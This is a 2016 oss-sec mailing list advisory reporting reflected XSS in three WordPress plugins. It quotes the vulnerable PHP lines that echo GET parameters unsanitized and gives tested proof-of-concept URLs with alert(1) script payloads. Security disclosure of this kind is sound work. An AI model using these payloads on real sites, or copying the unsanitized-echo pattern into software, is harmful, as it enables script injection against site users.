oss-sec mailing list archives
Reflected XSS in three Wordpress plugins.
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 11 May 2016 12:28:33 -0400
Hello List, I've manually confirmed these vulnerabilities: Title: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 Date: 2016-02-09 Download Site: https://wordpress.org/plugins/enhanced-tooltipglossary Vulnerability: There is a reflected XSS vulnerability in the following php code ./enhanced-tooltipglossary/backend/views/admin_importexport.php: 19: ?> (<?php echo $_GET['itemsnumber']; ?> items read from file)</div> The variable itemsnumber appears to send unsanitized data back to the users browser. DWF-2016-77246 PoC: This is a tested exploit: http://[target]/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=<script>alert(1)</script>&msg=imported Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=37 Title: Reflected XSS in wordpress plugin tera-charts v1.0 Date: 2016-02-09 Download Site: https://wordpress.org/plugins/tera-charts (removed by WP) Vulnerability: There is a reflected XSS vulnerability in the following php code ./tera-charts/charts/treemap.php: 52: var data_filename = "<?php echo $_GET['fn']; ?>"; 55: var chart_userid = "<?php echo $_GET['userid']; ?>"; The variable fn appears to send unsanitized data back to the users browser. DWF-2016-77716 PoC: This is a tested exploit: http://wp-site/tera-charts/charts/treemap.php?fn=";</script><script>alert(1);</script><script>"&userid=1 Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=455 Title: Reflected XSS in wordpress plugin pondol-carousel v1.0 (no response from author) Date: 2016-02-09 Download Site: https://wordpress.org/plugins/pondol-carousel Vulnerability: There is a reflected XSS vulnerability in the following php code ./pondol-carousel/pages/admin_create.php: 5: var itemid = "<?php echo $_GET["itemid"];?>"; The variable itemid appears to send unsanitized data back to the users browser. DWF-2016-77531 PoC: This is a tested exploit: http://wp-sitehttp://192.168.0.115/pondol-carousel/pages/admin_create.php?itemid=";</script><script>alert(1);</script>" Advisory: http://www.vapidlabs.com/wp/wp_advisory.php?v=524 For more information on DWF assignments see https://github.com/distributedweaknessfiling/DWF-Documentation
Current thread:
- Reflected XSS in three Wordpress plugins. Larry W. Cashdollar (May 11)
- Re: Reflected XSS in three Wordpress plugins. Henri Salo (May 12)